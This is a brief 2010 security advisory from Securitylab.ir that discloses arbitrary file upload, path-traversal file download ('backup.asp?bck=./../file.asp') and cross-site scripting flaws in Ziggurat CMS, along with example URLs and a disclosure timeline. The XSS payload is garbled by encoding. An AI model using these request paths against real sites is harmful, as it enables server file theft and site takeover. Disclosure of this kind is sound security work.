|
################################################################# =0D
# Securitylab.ir =0D
################################################################# =0D
# Application Info: =0D
# Name: Ziggurat CMS=0D
# Vendor: http://www.farsi-cms.com=0D
#################################################################=0D
Vulnerability: =0D
=0D
# Arbitrary File Upload=0D
http://site.com/manager/upload.asp=0D
=0D
# Remote File Download=0D
http://site.com/manager/backup.asp?bck=./../file.asp=0D
=0D
# Cross Site Scripting=0D
=0D">http://site.com/index.asp?id==0D
#################################################################=0D
# 2010-04-10 - Vendor notified=0D
# 2010-04-15 - Public disclosure=0D
################################################################# =0D
# Discoverd By: Pouya Daneshmand =0D
# Website: http://Pouya.Securitylab.ir =0D
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com=0D
###################################################################